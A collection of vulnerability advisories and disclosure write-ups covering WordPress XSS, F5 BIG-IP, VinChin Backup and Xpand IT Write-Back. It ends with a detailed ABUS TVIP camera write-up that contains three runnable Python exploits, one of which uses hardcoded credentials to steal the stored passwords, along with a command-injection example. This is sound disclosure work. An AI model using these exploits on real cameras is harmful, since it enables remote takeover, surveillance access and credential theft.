Unauth. Stored Cross-Site Scripting (XSS) vulnerability in UserFeedback Team User Feedback plugin <= 1.0.9 versions.

**Solution**

 Fixed

Update the WordPress User Feedback plugin to the latest available version (at least 1.0.10).

Dimas Maulana discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress User Feedback Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.0.10.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46153: WordPress  User Feedback plugin <= 1.0.9 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in LionScripts.Com Webmaster Tools plugin <= 2.0 versions.

**Solution**

 No fix

No patched version is available.

LEE SE HYOUNG (hackintoanetwork) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Webmaster Tools Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46093: WordPress Webmaster Tools plugin <= 2.0 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Triberr plugin <= 4.1.1 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Triberr Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-46199: WordPress Triberr plugin <= 4.1.1 - Cross Site Scripting (XSS) - Patchstack

F5 has alerted customers of a critical security vulnerability impacting BIG-IP that could result in unauthenticated remote code execution.
The issue, rooted in the configuration utility component, has been assigned the CVE identifier CVE-2023-46747, and carries a CVSS score of 9.8 out of a maximum of 10.
"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP

Network Security / Vulnerability

F5 has alerted customers of a critical security vulnerability impacting BIG-IP that could result in unauthenticated remote code execution.

The issue, rooted in the configuration utility component, has been assigned the CVE identifier **CVE-2023-46747**, and carries a CVSS score of 9.8 out of a maximum of 10.

"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands," F5 said in an advisory released Thursday. "There is no data plane exposure; this is a control plane issue only."

The following versions of BIG-IP have been found to be vulnerable -

*   17.1.0 (Fixed in 17.1.0.3 + Hotfix-BIGIP-17.1.0.3.0.75.4-ENG)
*   16.1.0 - 16.1.4 (Fixed in 16.1.4.1 + Hotfix-BIGIP-16.1.4.1.0.50.5-ENG)
*   15.1.0 - 15.1.10 (Fixed in 15.1.10.2 + Hotfix-BIGIP-15.1.10.2.0.44.2-ENG)
*   14.1.0 - 14.1.5 (Fixed in 14.1.5.6 + Hotfix-BIGIP-14.1.5.6.0.10.6-ENG)
*   13.1.0 - 13.1.5 (Fixed in 13.1.5.1 + Hotfix-BIGIP-13.1.5.1.0.20.2-ENG)

As mitigations, F5 has also made available a shell script for users of BIG-IP versions 14.1.0 and later. "This script must not be used on any BIG-IP version prior to 14.1.0 or it will prevent the Configuration utility from starting," the company warned.

Other temporary workarounds available for users are below -

*   Block Configuration utility access through self IP addresses
*   Block Configuration utility access through the management interface

Michael Weber and Thomas Hendrickson of Praetorian have been credited with discovering and reporting the vulnerability on October 4, 2023.

The cybersecurity company, in a technical report of its own, described CVE-2023-46747 as an authentication bypass issue that can lead to a total compromise of the F5 system by executing arbitrary commands as root on the target system, noting it's "closely related to CVE-2022-26377."

Praetorian is also recommending that users restrict access to the Traffic Management User Interface (TMUI) from the internet. It's worth noting that CVE-2023-46747 is the third unauthenticated remote code execution flaw uncovered in TMUI after CVE-2020-5902 and CVE-2022-1388.

"A seemingly low impact request smuggling bug can become a serious issue when two different services offload authentication responsibilities onto each other," the researchers said. "Sending requests to the 'backend' service that assumes the 'frontend' handled authentication can lead to some interesting behavior."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

F5 Issues Warning: BIG-IP Vulnerability Allows Remote Code Execution

The CallRail Phone Call Tracking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'callrail_form' shortcode in versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping on the 'form_id' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Timestamp:

10/24/2023 07:14:47 AM (3 days ago)

jamescallrail

Message:

Publish version 0.5.3  

Location:

callrail-phone-call-tracking/trunk

Files:

  

*   callrail.php (2 diffs)
*   readme.txt (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **callrail-phone-call-tracking/trunk/callrail.php**
    
    r2846932
    
    r2982876
    
     
    
    5
    
    5
    
    Description: Dynamically swap CallRail tracking phone numbers based on the visitor's referring source.
    
    6
    
    6
    
    Author: CallRail, Inc.
    
    7
    
     
    
    Version: 0.5.2
    
     
    
    7
    
    Version: 0.5.3
    
    8
    
    8
    
    Author URI: http://www.callrail.com
    
    9
    
    9
    
    \*/
    
    …
    
    …
    
     
    
    162
    
    162
    
        echo '<script type="text/javascript">window.crwpVer = 1;</script>';
    
    163
    
    163
    
        $escaped\_api\_key = esc\_js($api\_key);
    
    164
    
     
    
        wp\_enqueue\_script( 'swapjs', "//cdn.callrail.com/companies/$escaped\_api\_key/wp-0-5-2/swap.js" );
    
     
    
    164
    
        wp\_enqueue\_script( 'swapjs', "//cdn.callrail.com/companies/$escaped\_api\_key/wp-0-5-3/swap.js" );
    
    165
    
    165
    
    }
    
    166
    
    166
    
    167
    
    167
    
    function callrail\_form\_shortcode\_handler( $attributes ) {
    
    168
    
     
    
        $form\_id = $attributes\['form\_id'\];
    
     
    
    168
    
        $form\_id = esc\_attr($attributes\['form\_id'\]);
    
    169
    
    169
    
    170
    
    170
    
        if ( ! $form\_id ) {
    
*   **callrail-phone-call-tracking/trunk/readme.txt**
    
    r2846932
    
    r2982876
    
     
    
    4
    
    4
    
    Requires at least: 3.0
    
    5
    
    5
    
    Tested up to: 6.1.1
    
    6
    
     
    
    Stable tag: 0.5.2
    
     
    
    6
    
    Stable tag: 0.5.3
    
    7
    
    7
    
    8
    
    8
    
    Dynamically swap CallRail tracking phone numbers based on the visitor's referring source.
    
    …
    
    …
    
     
    
    27
    
    27
    
    28
    
    28
    
    \== Changelog ==
    
     
    
    29
    
     
    
    30
    
    \= 0.5.3 =
    
     
    
    31
    
    \* Security fix: Escape short code attributes
    
    29
    
    32
    
    30
    
    33
    
    \= 0.5.2 =
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-5051: Changeset 2982876 for callrail-phone-call-tracking – WordPress Plugin Repository

Cross Site Scripting (XSS) vulnerability in PwnCYN YXBOOKCMS v.1.0.2 allows a physically proximate attacker to execute arbitrary code via the library name function in the general settings component.

**Product Name:**  
YXBOOKCMS

**Affect version:**  
1.0.2

**Case Address:**  
https://down.chinaz.com/soft/37726.htm （Program download address）  
https://www.ys-bs.com/ （The website address has been hacked）

**Vulnerability Type:**  
Stored XSS

**Description:**  
The library name can be modified in the general settings section of the backend homepage.  

Due to the lack of filtering of input user content in the code, executable JavaScript code can be executed. As the modified part is the website title, the code will be triggered every time it is accessed, resulting in a storage based XSS vulnerability.  
  
  
An attacker can write XSS statements to obtain user information (cookies, etc.) that visits the website.

CVE-2023-46504: YXBOOKCMS Stored XSS · Issue #1 · PwnCYN/YXBOOKCMS

Cross Site Scripting (XSS) vulnerability in PwnCYN YXBOOKCMS v.1.0.2 allows a remote attacker to execute arbitrary code via the reader management and book input modules.

**Product Name:**  
YXBOOKCMS

**Affect version:**  
1.0.2

**Case Address:**  
https://down.chinaz.com/soft/37726.htm （Program download address）  
https://www.ys-bs.com/ （The website address has been hacked）

**Vulnerability Type:**  
Reflected XSS

**Description:**  
The reader management and book input module in the background does not filter the input, so there is reflective XSS.  

There are no restrictions on readers and book names when adding readers and entering books, resulting in executable JavaScript code and reflective XSS vulnerabilities.

CVE-2023-46503: YXBOOKCMS Reflected XSS · Issue #2 · PwnCYN/YXBOOKCMS

VinChin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.* was discovered to contain hardcoded credentials.

Sun Oct 15, 2023 by BloodyShell in  vulnerability, research, LeakIX  vulnerability, research, LeakIX

**Vulnerability research**

At LeakIX we analyse new vulnerabilities discovered by other researchers every day.

Our goal is to understand them, discover non-intrusive ways to detect them and provide our customers with a list of vulnerable assets.

While researching what others have already found is always an exciting challenge and provides valuable experience, it was time for us to go through the research and disclosure process first hand and get our first CVE on the board.

We decided to look for issues in critical software. It was natural for us to select the “Infrastructure Backup” category. Such software will hold an entire organisation’s data but also credentials to critical points of the network, including:

*   Servers
*   Hypervisors
*   Storage
*   Cloud accounts

**VinChin Backup**

VinChin Backup & Recovery is an **all-in-one backup solution for virtual infrastructures** supporting VMWare, KVM, Xen Server, Hyper-V, OpenStack and more. The product also supports AWS, Azure and other cloud providers as backup storage.

It is used by companies like Sony, Guizhou Power Grid, and while its main market is located in Asia, it has decent adoption on other continents and protects over 10,000 clients.

**CVE-2023-45499**

During our research we discovered an HTTP API exposed by VinChin Backup. This API can be accessed using hard-coded credentials.

The privileges granted are high since ACLs are bypassed for this authentication method.

The list of actions available from the API includes:

*   View/Edit/Add/Delete storage
*   View/Delete backups
*   View/Edit/Add/Delete jobs
*   View/Edit/Add/Delete cloud accounts
*   View/Edit/Add/Delete hypervisors
*   View/Edit/Add/Delete users
*   Query various information such as:
    *   Services status
    *   System information
    *   Licensing

The list is non-exhaustive.

**CVE-2023-45498**

While exploring the various functionalities exposed by the API a particular endpoint was found vulnerable to improper input sanitization. A specially crafted payload results in remote code execution allowing the attacker to execute code with the permissions of the web server.

**Demo**

**Affected versions**

During our routine scans we identified vulnerable products starting from 5.0 up until the last known version.

**IOC**

Any requests made to /api/ from an untrusted IP should be considered suspicious. The log can be found in /var/log/nginx/access.log.

**Mitigation**

At this point VinChin has not acknowledged the issue despite our multiple requests, we can only recommend to remove all exposed instances from untrusted network.

**Timeline**

    2023-09-22: LeakIX makes initial contact
    2023-09-25: VinChin request details
    2023-09-25: LeakIX request Safe harbour
    2023-09-26: No reply, LeakIX requests update
    2023-09-27: No reply, LeakIX sends PoC
    2023-09-29: No reply, LeakIX requests feedback
    2023-10-05: No reply, LeakIX requests feedback
    2023-10-10: No reply, LeakIX requests feedback from alternative email
    2023-10-11: No reply, LeakIX requests feedback from another alternative email
    2023-10-16: No reply, CVE reserved and vendor notified
    2023-10-18: No reply, LeakIX sent 7 day disclosure warning
    2023-10-24: LeakIX sends early warning to providers hosting VinChin on their network.
    2023-10-26: No reply, Publishing this advisory

CVE-2023-45499: CVE-2023-45498: RCE in VinChin Backup

Xpand IT Write-back manager v2.3.1 allows attackers to perform a directory traversal via modification of the siteName parameter.

During an authorised penetration testing assessment conducted on Xpand IT’s Write-Back software, Balwurk’s security team found multiple security vulnerabilities, first disclosed to the customer and then responsibly submitted to the MITRE CVE program.

The discovered vulnerability allows an attacker to change the directory to which an uploaded file is saved on the filesystem.

This blog post is the second post of a five-part series in which we will technically describe five security vulnerabilities and how they were detected and exploited.

**What is Write-Back?**

Write-Back is a Tableau extension that enables users to submit data directly from a Tableau dashboard to your database, allowing them to implement any actionable use case without leaving the analysis flow.

Write-Back allows users to take the Tableau usage further and implement use cases where you need users to input data, such as forecasting, planning, adding comments, or any actionable process. Includes features like on-premises execution, audit, multiple back-end databases, and integrated authentication.

Before diving into more technical details, we should describe the layout of Write-Back’s high-level back-end architecture:

**Write-Back (Server)**: Tableau extensions are web-based and deployed on a separate application server from the Tableau Server/Cloud. This means that Write-Back should be placed side by side with Tableau, ideally on a separate machine. Users will interact with the Write-Back extension through the Tableau dashboards that can be on different Tableau platforms, i.e., Tableau Desktop, Tableau Server, or even Tableau Cloud.

**Write-Back Manager**: Centralizes all configurations and enables platform administrators to take full control of how Write-Back is configured. All of this is done on a web UI. Each Write-Back installation has its own Write-Back manager deployed on the same machine, allowing it to manage that instance.

**Technical description**

CVE-2023-27170 is a path or directory traversal security vulnerability that allows an authenticated user to upload a file to any location on the file system using any of the multiple file upload features on the Write-Back Manager.

This vulnerability was initially detected by changing the uploaded filename through a man-in-the-middle attack.

In the particular case of the customised logo upload feature, the name under which the logo file would be written to disk equalled the value passed in the siteName parameter, which by default was always 00000000-0000-0000-0000-000000000000. By manipulating the value of this parameter and adding special characters such as dots ‘.’ and slashes ‘/’, an attacker can change the path to which the file will be written:

**_Figure 1 – Logo file upload._**

In this example, the logo was placed in one folder hierarchically above the logos folder:

**_Figure 2 – Logo file uploaded to a different folder._**

The root cause of this vulnerability can be found in the uploadLogoFile function of the ThemesManager class, which handles the upload of a custom logo file:

**_Figure 3 – Cause of the vulnerability._**

The siteName parameter is simply concatenated together with the file extension and added to the writePath, resulting in the manipulation of the folder’s path to which the file is uploaded to.

**Impact**

This vulnerability could potentially be exploited in multiple manners. A malicious user could overwrite critical files, upload massive files, cause a file space denial of service, or upload dangerous files into the web tree to achieve code execution.

**CVE ID:** CVE-2023-27170  
**CVSS 3.1 Base Score:** 5.5  
**CVSS Vector:** AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L  
**Affected Vendor:** Xpand IT  
**Affected Product:** Write-Back  
**Affected Version:** Write-Back Manager v2.3.1

**Mitigation**

Update Write-Back to at least version 4.1.

**Timeline**

12-12-2022 – Vulnerability detected and reported to Write-Back.

22-02-2023 – Vulnerability submitted to MITRE.

10-03-2023 – Vulnerability accepted and CVE-2023-27170 reserved.

12-07-2023 – Official Patch released by Write-Back team.

20-10-2023 – Public disclosure of CVE-2023-27170.

**Credits**

**Bruno Pincho** | Penetration Tester at Balwurk 

**References**

*   https://writeback4t.com

CVE-2023-27170: CVE-2023-27170 - Improper Limitation of a Pathname to a Restricted Directory - Balwurk

Due to incorrect access control, unauthenticated remote attackers can view the /video.mjpg video stream of certain ABUS TVIP cameras.

**Background⌗**

It was a chill friday evening when Ilias, Alexander and myself sat around our local hackspace Chaosdorf, ate some pizza and played around with the ABUS security camera we were able to get in our hands shortly before. As the company has quite some reputation in Germany, we assumed that there wouldn’t be much to find security-wise, also because this camera was one of the most expensive ones in the consumer market. Little did we know that we’d get our first CVEs and security fame that evening as well…

**Objective⌗**

> August Bremicker und Söhne KG, commonly known as ABUS, is a German manufacturer of preventative security technology based in Wetter, North Rhine-Westphalia.
> 
> *   Wikipedia

While ABUS is mostly focusing on physical security technology like door locks and chains, security cameras are also an important branch of their portfolio. Those cameras are bought from a white-label producer, branded and sold. In this case, the affected cameras were produced by taiwanese producer Grain Media with the GM812X chipset.

This means that the discovered vulnerabilities were not necessarily ABUS’ fault, as they didn’t develop the firmware. They could’ve conducted penetration tests though.

Affected by the vulnerabilities are the model numbers / lines:

*   Compact Cameras
    *   TVIP10000
    *   TVIP10001
    *   TVIP10005
    *   TVIP10005A
    *   TVIP10005B
    *   TVIP10050
    *   TVIP10051
    *   TVIP10055A
    *   TVIP10055B
    *   TVIP10500
    *   TVIP10550
    *   TVIP11000
    *   TVIP11050
    *   TVIP11500
    *   TVIP11501
    *   TVIP11502
    *   TVIP11550
    *   TVIP11551
    *   TVIP11552
*   Cameras with movable head
    *   TVIP20000
    *   TVIP20050
    *   TVIP20500
    *   TVIP20550
    *   TVIP21000
    *   TVIP21050
    *   TVIP21500
    *   TVIP21501
    *   TVIP21502
    *   TVIP21550
    *   TVIP21551
    *   TVIP21552
    *   TVIP22500
*   Dome cameras
    *   TVIP31000
    *   TVIP31001
    *   TVIP31050
    *   TVIP31500
    *   TVIP31501
    *   TVIP31550
    *   TVIP31551
    *   TVIP32500
*   Box cameras
    *   TVIP51500
    *   TVIP51550
*   Outside dome cameras
    *   TVIP71500
    *   TVIP71501
    *   TVIP71550
    *   TVIP71551
    *   TVIP72500

Those cameras were sold from 2010 to 2014.

**Timeline⌗**

*   XX-09-2018: Discovery of vulnerabilities in lab environment
*   XX-09-2018: Communication with CCC e.V. for disclosure handling
*   26-11-2018: Initial contact with ABUS, no response
*   18-02-2019: Start of responsible disclosure process with ABUS
*   03-05-2019: Public Announcement by ABUS for a replacement program
*   07-05-2019: Publication of CCC blogpost

This disclosure was picked up by German press shortly after: Heise, Golem, SPIEGEL Online

**Vulnerabilities⌗****CVE-2018-16739⌗**

Authenticated read and write access through directory traversal with command execution

**Description⌗**

Through directory traversal it is possible to utilize the file browser of the web frontend, which seems to be only for displaying file server content, for arbitrary read, write and execution. The browser can be used to read and write files outside the file server directory and to list the contents of any directory. This is done with root privileges.

The affected endpoints are:

*   /cgi-bin/admin/fileread?READ.filePath=<Path> to read the specified file
*   /cgi-bin/admin/filewrite?SAVE.filePath=<Path> to write to the specified file
*   /cgi-bin/admin/sdstate?action=filelistnas&directory=<Path> to list a directory

**Exploitation⌗**

For arbitrary read and write, the exploitation of the endpoints is as simple as it gets, by prefixing the desired path with ../../../../ or by specifying an absolute path.

A trick is required to move from arbitrary write to code execution: if a bash script is placed in the CGI scripts folder of the web server and this script is called via a web browser, the shell script is executed with root privileges. This is also the trick applied on the POC exploit:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import random
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-16739")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        referenceID = random.randint(1000, 9999)
    
        print(huepy.cyan("[~] Exploit for CVE-2018-16739"))
        print(huepy.cyan("    Your reference number is %i." % (referenceID)))
    
        prepareShell(args.url, referenceID, args.cmd)
        execCmd(args.url, referenceID)
        readCmd(args.url, referenceID)
        mrproper(args.url, referenceID)
    
    
    def prepareShell(target, refID, cmd):
        writeCmd(target, refID, "#!/bin/sh\n%s 1>/tmp/%i.log 2>&1" % (cmd, refID))
    
    
    def writeCmd(target, refID, cmd):
        percentCmd = urllib.parse.quote(cmd)
        print(huepy.yellow("[~] writing /opt/cgi/admin/%i.sh" % (refID)))
        r = requests.get("%s/cgi-bin/admin/filewrite?SAVE.filePath=/opt/cgi/admin/%i.sh&SAVE.fileData=%s" % (target, refID, percentCmd), verify=False)
    
    
    def execCmd(target, refID):
        print(huepy.yellow("[~] Executing reference number %i..." % (refID)))
        r = requests.get("%s/cgi-bin/admin/%i.sh" % (target, refID), verify=False)
    
    
    def readCmd(target, refID):
        r = requests.get("%s/cgi-bin/admin/fileread?READ.filePath=/tmp/%i.log" % (target, refID), verify=False)
        print(huepy.green("[+] Command returned on %i:\n" % (refID)) +  r.text)
    
    
    def mrproper(target, refID):
        print(huepy.green("[+] mrproper-ing your waste..."))
        writeCmd(target, refID, "#!/bin/sh\nrm /tmp/%i.log /opt/cgi/admin/%i.sh" % (refID, refID))
        execCmd(target, refID)
    
    
    if __name__ == '__main__':
        main()
    

Note that, as the OS injection itself is blind, log output of your command(s) needs to be written into a log file and read again after the command finishes. This means that if your command runs for an hour, you’ll only be able to get the output after an hour.

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17558⌗**

Hardcoded administrator account with code execution as root

**Description⌗**

The web server is protected against unauthorized access by a user name and password, which can be changed by the person who purchased the camera. This is admin:12345 or admin:admin by default, dependent on software and model. This is dangerous in itself, since an attacker can exploit the fact that the owner of the camera usually does not change this password.

Regardless of the initial values for the admin user account, the web server is also configured to accept the user name manufacture with the password erutcafunam for the /cgi-bin/mft directory in the web server’s root directory. These values cannot be deleted by the owner of the camera, nor can they be changed. This means that all cameras running with the affected software versions can be accessed using this user name and password.

There are several endpoints in the /cgi-bin/mft directory. These endpoints are responsible for changing the WiFi settings of the device. These can be attacked at various points through an OS injection to execute code with root privileges:

**Evaluation⌗**

If the manufacture user account is combined with the input attack, it is possible to execute arbitrary code as root on the camera from outside, even if the owner of the camera has chosen secure passwords. These are simply bypassed.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:C/A:C = Base Score **10.0**

**Exploitation⌗**

Obviously, using the hard-coded credentials for your purposes is as easy as it gets.

Bringing together the puzzle pieces “hardcoded credentials” and “OS injection” gives you endless possibilities; one of them is to leak out the (user-managed) credentials:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    import base64
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17558")
        parser.add_argument('ip', type=str, help='target IP, eg 127.0.0.1')
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17558"))
    
        copyCreds(args.ip) and showCreds(args.ip) and delCreds(args.ip)
    
    
    def copyCreds(target):
        print(huepy.yellow("[~] Copying creds"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;cp%%20/var/www/secret.passwd%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL!"))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def showCreds(target):
        print(huepy.yellow("[~] Here are the credentials of %s" % (target)))
        r = requests.get("http://%s/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] SUCCESSFUL! Here you go:"))
            print("Rights\t\t| Password\t|")
            for line in r.text.split("\n"):
                if "0000" in line:
                    parts = line.split(" ")
                    print("%s\t| %s\t|" % (parts[0], base64.b64decode(parts[1]).decode("utf-8")))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    def delCreds(target):
        print(huepy.yellow("[~] Cleaning up"))
        r = requests.get("http://manufacture:erutcafunam@%s/cgi-bin/mft/wireless_mft?ap=</invalid;rm%%20/web/html/leakedcredentials" % (target), verify=False)
    
        if r.status_code == 200:
            print(huepy.green("[+] Successful. Thanks for your cooperation."))
            return True
        else:
            print(huepy.red("[-] Failed. Server is not vulnerable..."))
            return False
    
    
    if __name__ == '__main__':
        main()
    

**CVE-2018-17879⌗**

Remote code execution through OS injection

**Description⌗**

The /cgi-bin/ directory contains several scripts that are used to control and configure the camera. Among other tasks, these scripts are responsible for changes to the camera’s image settings (contrast, color values, brightness) or the network settings of the device. The attack is based on the fact that some of the scripts do not check input that comes from the user and are passed directly to the system() command. If control characters are used to spoof the user input, arbitrary C ode can be executed. For example, such an input could look like this: $(shutdown -h now). This would shut down the camera from the outside. An attacker could use this to completely take over the camera, attack the internal network (private or corporate), launch further attacks from the camera, as well as change, pause or delete the camera’s image, and completely disable the camera.

**Exploitation⌗**

As simple as wrapping a reverse shell code in $(...).

See this exploit, where the injection happens in the UPnP HTTP Port field:

    #!/usr/bin/env python3
    import argparse
    import requests
    import urllib
    import huepy
    
    
    def main():
        parser = argparse.ArgumentParser(description="exploit-17879")
        parser.add_argument('url', type=str, help='target url including port, eg http://127.0.0.1:8080')
        parser.add_argument("cmd", type=str, help="the cmd to exec, e.g. 'ls /'")
        args = parser.parse_args()
    
        print(huepy.cyan("[~] Exploit for CVE-2018-17879"))
    
        execCmd(args.url, args.cmd)
    
    
    def execCmd(target, command):
        print(huepy.green("[~] Executing command '%s'..." % (command)))
        percentCommand = urllib.parse.quote(command)
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1%%3e/dev/null%%202%%3e/dev/null;%s;false" % (target, percentCommand), verify=False)
        print(r.text[:-3])
        print(huepy.yellow("[~] Cleaning up..."))
        r = requests.get("%s/cgi-bin/admin/param?action=update&General.Network.UPnP.NATTraversal.HTTPPort=1337" % (target), verify=False)
    
    
    if __name__ == '__main__':
        main()
    

**Evaluation⌗**

CVSS v2: AV:N/AC:L/Au:S/C:C/I:C/A:C = Base Score **9.0**

**CVE-2018-17878⌗**

Remote code execution through buffer overflows

**Description⌗**

Almost all of the CGI scripts used by the web server take user input to know what to do. The function that is internally responsible for copying this input is sprintf(). This function is vulnerable to a buffer overflow. This allows an attacker, by typing in a specially crafted string, to write over the memory allocated to it, and thus gain complete control of the program and achieve code execution as root.

**Exploitation⌗**

Depending on the binary, buffer size and stack; as no security protections like stack canaries or NX / Data Execution Prevention are in place, this could be easily done via either Shellcode or ROP.

**Evaluation⌗**

CVSS v2: AV:N/AC:H/Au:S/C:C/I:C/A:C = Base Score **7.1**

**CVE-2018-17559⌗**

Access control bypass

**Description⌗**

The web server gets the camera feed from the CGI script /opt/cgi/jpg/image. This script delivers the current frame every second. This script is symlinked to many places in the file system. Among others to /cgi-bin/admin/image, /cgi-bin/admin/image.jpg, /tmp/video.mp4, /cgi-bin/operator/image.jpg.

Most of these endpoints are password protected in the configuration file of the webserver, boa.conf. However, on lines 314-321 it can be seen that after the script and the symlinks to the script are password protected, they are transferred somewhere else again, and these new endpoints are not password protected:

    # boa.conf, L314-321
    Auth /cgi-bin/jpg /var/www/secret.passwd
    
    # [...]
    
    Transfer /video.mp4 /tmp/video.mp4
    Transfer /video.3gp /tmp/video.mp4
    Transfer /video.mjpg /tmp/video.mp4
    Transfer /video.h264 /tmp/video.mp4
    

This results in an attacker accessing /video.mp4 or /video.mjpg being able to view the video feed without the need to authenticate.

**Exploitation⌗**

Access /video.mp4 or /video.mjpg to see the video feed without authentication.

**Evaluation⌗**

As the video stream is the most important output of a security camera, being able to circumvent the protection of the video stream is critical, especially taking into consideration what direction and perspective the camera is facing.

CVSS v2: AV:N/AC:L/Au:N/C:C/I:N/A:N = Base Score **7.8**

**Overall Evaluation & Conclusion⌗**

An attacker can completely take over the camera, attack the internal network (private or company network), launch further attacks from the camera, change or delete the image of the camera, or completely disable the camera, as well as put the camera completely out of operation. This could be particularly problematic in security-critical scenarios, e.g., criminal acts that are recorded and documented by the camera, as evidence could be lost.

While the replacement program may give end users new cameras (which are hopefully not prone to the security issues described here, but I didn’t test that), the risk of having a always-on security device with weak hardware and network access persists. Please put such devices in a separate network or VLAN, protect it with firewall rules, and avoid credential reusage. Reviewing if you really need cameras connected to the internet could be another important step in becoming more secure.

Tag

#web